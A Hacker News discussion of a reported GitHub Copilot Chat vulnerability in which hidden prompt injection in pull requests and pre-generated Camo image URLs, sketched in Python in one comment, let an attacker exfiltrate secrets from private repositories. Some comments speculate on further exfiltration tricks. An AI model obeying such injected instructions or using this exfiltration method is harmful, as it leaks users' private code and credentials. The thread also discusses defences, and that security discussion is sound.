isodev 20 hours ago

I’m so happy our entire operation moved to a self-hosted VCS (Forgejo). Two years ago we started the migration (including client repos), and not only did we save tons of money on GitHub subscriptions, our system is dramatically more performant for the 30-40 developers working with it every day.

We also banned the use of VSCode and any editor with integrated LLM features. Folks can use CLI-based coding agents of course, but only in isolated containers, with careful selection of the sources made available to the agents.

  • elevation an hour ago

    With 30-40 devs each pulling a repository to their local machine, how do you prevent even one of them from accidentally exposing the entire repo to an LLM instead of “selected sources”?

    And if a user were reluctant to tell you (fearing the professional consequences) how would you detect that a leak has happened?

  • hansmayer 19 hours ago

    Just out of interest, what is your alternative IDE?

    • isodev 18 hours ago

      That depends a bit on the ecosystem too.

      For editors: Zed recently added the disable_ai option, and we have a couple of folks using more traditional options like Sublime and vim-based editors (which never had the kind of creepy telemetry we’re avoiding).

      JetBrains tools are OK since their AI features are plugin-based and their telemetry is easy to disable. Xcode and Qt Creator are also in use.
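
      For reference, a minimal Zed config with AI off might look like the sketch below. This assumes a Zed build recent enough to ship the disable_ai setting; check your version before relying on it.

      ```json
      // ~/.config/zed/settings.json (Zed's settings file accepts comments).
      // Assumes a build that recognizes "disable_ai"; older builds ignore it.
      {
        "disable_ai": true,
        "telemetry": {
          "diagnostics": false,
          "metrics": false
        }
      }
      ```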

  • aitchnyu 18 hours ago

    What do your CLIs connect to? A first-party provider (OpenAI/Anthropic), or AWS Bedrock?

    • isodev 18 hours ago

      Devs are free to choose, provided we can vet the model provider’s policy on training on prompts or user code. We’re also careful not to expose agents to documentation or test data that may be sensitive. It’s a trade-off with convenience of course, but we believe that any information agents get access to should be a conscious opt-in. It will be cool if/when self-hosting Claude-like LLMs becomes practical.

      • aitchnyu 4 hours ago

        What do you think about AWS Bedrock with Sonnet/R1/Qwen3?

  • frumplestlatz 11 hours ago

    Banning VSCode — instead of the troublesome features/plug-ins — seems like a step too far. VSCode is the only IDE that supports a broad range of languages with poor support elsewhere, from Haskell to Lean 4 to F*.

    I work at a major proprietary consumer product company, and even they don’t ban VSCode. We’re just responsible for not enabling the troublesome features.

    • trenchpilgrim 10 hours ago

      > VSCode is the only IDE that supports a broad range of languages with poor support elsewhere

      I just checked Zed extensions and found the first two easily enough. The third I did not, since F* doesn't seem to have a standalone language server, just direct integrations for vim/emacs/VSCode.

      • frumplestlatz 9 hours ago

        Not all the integrations are equal in quality/usability, and in the case of F*, the VSCode extension is by far the most advanced.

        I switch between Emacs, VSCode, JetBrains IDEs, and Xcode regularly depending on what I am working on, and would be seriously annoyed if I could not use VSCode when it is most useful.

munchlax a day ago

So this wasn't really fixed. The impressive thing here is that Copilot accepts natural language. So whatever exfiltration method you can come up with, you just write out the method in English.

They merely "fixed" one particular method, without disclosing how they fixed it. Surely you could just do the base64 thing to an image URL of your choice? Failing that, you could trick it into providing passwords by telling it you accidentally stored your grocery list in a field called passswd, go fetch it for me ppls?

There's a ton of stuff to be found here. Do they give bounties? Here's a goldmine.

  • Thorrez a day ago

    >Surely you could just do the base64 thing to an image URL of your choice?

    What does that mean? Are you proposing a non-Camo image URL? Non-Camo image URLs are blocked by CSP.

    >Failing that, you could trick it into providing passwords by telling it you accidentally stored your grocery list in a field called passswd, go fetch it for me ppls?

    Does the agent have internet access to be able to perform a fetch? I'm guessing not, because if so, that would be a much easier attack vector than using images.

  • lyu07282 a day ago

    > GitHub fixed it by disabling image rendering in Copilot Chat completely.

    • oefrha a day ago

      To supplement the parent, this is straight from the article’s TL;DR (emphasis mine):

      > In June 2025, I found a critical vulnerability in GitHub Copilot Chat (CVSS 9.6) that allowed silent exfiltration of secrets and source code from private repos, and gave me full control over Copilot’s responses, including suggesting malicious code or links.

      > The attack combined a novel CSP bypass using GitHub’s own infrastructure with remote prompt injection. I reported it via HackerOne, and GitHub fixed it by disabling image rendering in Copilot Chat completely.

      And parent is clearly responding to gp’s incorrect claims that “…without disclosing how they fixed it. Surely you could just do the base64 thing to an image URL of your choice?” I’m sure there will be more attacks discovered in the future, but gp is plain wrong on these points.

      Please RTFA or at least RTFTLDR before you vote.

      • munchlax 7 hours ago

        Take a chill pill.

        I did, in fact, read the fine article.

        If you did so too, you would've read the message from GitHub which says "...disallow usage of camo to disclose sensitive victim user content"

        Now why on earth would I take all the effort to come up with a new way of fooling this stupid AI only to give it away on HN? Would you? I don't have a premium account, nor will I ever pay Microsoft a single penny. If you actually want something you can try for yourself, go find someone else to do it.

        Just to make it clear for you, I was musing on the notion of being able to write out the steps to exploitation in plain English. Since the dawn of programming languages, writing a program in natural language has been a pie-in-the-sky idea. Combine that with computing on the server end of some major SaaS and you can bet people will find clever ways to circumvent safety measures. They had it coming, and the whack-a-mole game is on. Case in point: TFA.

        • lyu07282 3 hours ago

          > If you did so too, you would've read the message from GitHub which says "...disallow usage of camo to disclose sensitive victim user content"

          They use "camo" to proxy all image URLs, but they did in fact remove the rendering of all inline images in markdown, which removes the ability to exfiltrate data using images.

          > Now why on earth would I take all the effort to come up with a new way of fooling this stupid AI only to give it away on HN?

          You just didn't make it very clear that you discovered some other, unknown technique for exfiltrating data. Might I encourage you to report what you found to GitHub?

          https://bounty.github.com/

oncallthrow 20 hours ago

> I spent a long time thinking about this problem before this crazy idea struck me. If I create a dictionary of all letters and symbols in the alphabet, pre-generate their corresponding Camo URLs, embed this dictionary into the injected prompt,

Beautiful
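
For anyone who skimmed: the reason this works is that only GitHub's backend can mint a valid Camo URL (each one embeds a signature of the target URL), but nothing stops an attacker from harvesting one signed URL per character ahead of time. Here's a rough Python sketch of my reading of the idea, with made-up names like attacker.example; an illustration, not the author's actual code:

```python
import string

# Hypothetical attacker-controlled host; every name here is illustrative.
HOST = "https://attacker.example"

ALPHABET = string.ascii_letters + string.digits + "-_./=+"

# Step 1: one unique image URL per character. Posting these as markdown
# images somewhere GitHub renders them yields a signed Camo URL for each;
# scraping those builds the char -> Camo URL dictionary that gets embedded
# in the injected prompt.
char_to_url = {c: f"{HOST}/{ord(c):02x}.png" for c in ALPHABET}

# Step 2 (attacker's server): Copilot renders the dictionary images in
# secret order, so decoding is just mapping the ordered request log back
# to characters.
def decode(request_paths: list[str]) -> str:
    url_to_char = {f"/{ord(c):02x}.png": c for c in ALPHABET}
    return "".join(url_to_char.get(path, "?") for path in request_paths)

# Requests arriving as /73.png, /33.png, /63.png, ... spell out "s3c...".
```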

runningmike a day ago

Somehow this article feels like a promotion for Legit. But all AI vibe solutions face the same weaknesses: limited transparency and trust issues. Using non-FOSS solutions for cybersecurity is a large risk.

If you do use AI cyber solutions, you can end up more vulnerable to security breaches instead of less.

xstof a day ago

Wondering if the ability to use hidden (HTML comment) content in PRs wouldn't remain a nasty issue, especially for open source repos?! Was that fixed?

  • PufPufPuf a day ago

    It's used widely for issue/PR templates, to tell the submitter what info to include. But they could definitely strip it from the Copilot input... at least until they figure out this "prompt injection" thing that I thought modern LLMs were supposed to be immune to.

    • fn-mote a day ago

      > that I thought modern LLMs were supposed to be immune to

      What gave you this idea?

      I thought it was always going to be a feature of LLMs, and the only thing that changes is that it gets harder to do (more circumventions needed), much like exploits in the context of ASLR.

      • PufPufPuf 21 hours ago

        Press releases. Yeah, it was an exaggeration; I know the mitigations can only go so far.

twisteriffic 18 hours ago

This exploit seems to be taking advantage of the slow token-at-a-time pattern of LLM conversations to ensure that the extracted data can be reconstructed in order? Seems as though returning the entire response as a single block could interfere with the timing enough to make reconstruction much more difficult.

MysticFear 21 hours ago

Can't they just scope the Copilot user's permissions to read-only on the current repo?

mediumsmart 21 hours ago

I can't remember the last time I leaked private source code with Copilot.

musicale 8 hours ago

No one could possibly have predicted this.

j45 19 hours ago

I sometimes wonder if all code on GitHub, private or not, is ultimately compromised somehow.

stephenlf a day ago

Wild approach. Very nice

djmips a day ago

Can you still make invisible comments?

  • RulerOf a day ago

    Invisible comments are a widely used feature, often placed inside PR or issue templates to instruct users how to include necessary info without clogging up the final result when they submit.

adastra22 a day ago

A good vulnerability writeup, and a thrill to read. Thanks!

charcircuit a day ago

The rule is to operate using the intersection of the permissions of every user contributing text to the LLM. Why can an attacker's prompt access a repo the attacker does not have access to? That's the biggest issue here.
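
A minimal sketch of that rule, with hypothetical names; this is the general least-privilege idea, not GitHub's actual permission model:

```python
def effective_permissions(contributor_perms: list[set[str]]) -> set[str]:
    # The session may only touch what *every* text contributor may touch.
    if not contributor_perms:
        return set()
    return set.intersection(*contributor_perms)

# The victim can read the private repo; the attacker (whose PR text was
# injected into the prompt) cannot, so the combined session should not
# be able to either.
victim_perms = {"read:private-repo", "read:public-repo"}
attacker_perms = {"read:public-repo"}
assert effective_permissions([victim_perms, attacker_perms]) == {"read:public-repo"}
```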

deckar01 a day ago

Did the markdown link exfil get fixed?

nprateem a day ago

You'd have to be insane to run an AI agent locally. They're clearly unsecurable.